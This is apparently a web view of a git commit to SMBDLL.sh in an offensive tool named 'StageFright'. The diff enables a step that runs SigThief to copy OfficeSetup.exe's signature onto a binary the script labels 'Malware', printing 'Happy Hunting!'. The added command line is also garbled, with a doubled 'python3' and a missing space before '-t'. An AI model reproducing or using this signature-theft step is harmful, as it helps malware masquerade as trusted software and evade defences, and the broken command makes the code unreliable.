Browse Source

Update SMBDLL.sh

assume-breach 2 years ago
parent
commit
a93b1f1f37
1 changed files with 8 additions and 7 deletions
  1. 8 7
      StageFright/StageFright/StageFright/SMBDLL/SMBDLL.sh

+ 8 - 7
StageFright/StageFright/StageFright/SMBDLL/SMBDLL.sh

@@ -169,12 +169,13 @@ rm shell*
 echo -e ${yellow}"***Malware Compiled***"${clear}
 echo ""
 sleep 2
-#echo -e ${yellow}"+++Adding Binary Signature+++"${clear}
-#echo ""
-#sleep 2
-#python3 StageFright/StageFright/ResourcesSigThief/sigthief.py -i StageFright/StageFright/SMBDLL/Resources/OfficeSetup.exe #-t $MALWARE -o signed$MALWARE >/dev/null 2>&1
-#mv signed$MALWARE $MALWARE
-#echo -e ${yellow}"***Signature Added. Happy Hunting!**"${clear}
-#echo ""
+echo -e ${yellow}"+++Adding Binary Signature+++"${clear}
+echo ""
+sleep 2
+python3 python3 StageFright/Resources/SigThief/sigthief.py -i StageFright/Resources/OfficeSetup.exe-t $MALWARE -o signed$MALWARE >/dev/null 2>&1
+mv signed$MALWARE $MALWARE
+echo -e ${yellow}"***Signature Added. Happy Hunting!**"${clear}
+echo ""
+